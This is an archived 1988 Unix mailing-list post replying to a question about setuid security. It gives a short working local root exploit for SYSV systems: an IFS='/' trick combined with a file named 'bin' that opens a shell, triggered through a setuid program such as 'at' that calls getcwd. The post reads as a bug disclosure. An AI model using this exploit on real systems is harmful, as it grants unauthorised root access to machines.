A security hole
Uwe Mager
jum at cosmo.UUCP
Fri Mar 11 11:30:22 AEST 1988
In article <478 at minya.UUCP> jc at minya.UUCP (John Chambers) writes:
...
>
>Anyhow, what can one do with getcwd() or popen() within a setuid program
>(root or otherwise) that isn't a consequence of the search path? If there
>is a real security hole here, I'd be very interested in reading about it.
There is a nice hack to make the sh misunderstood the path variable.
For example the following will work on most SYSV machines:
in file named ``bin'' in your cwd:
IFS=" \t\n" # escapes for readability
/bin/sh </dev/tty >/dev/tty 2>&1
pwd
and now from a command line:
IFS="/"; export IFS
at now + 1 minute # or any setuid root containing getcwd
This will not work with the Korn shell, there is a special check for IFS.
--
Jens-Uwe Mager
jum at focus.UUCP || jum at cosmo.UUCP
More information about the Comp.bugs.sys5
mailing list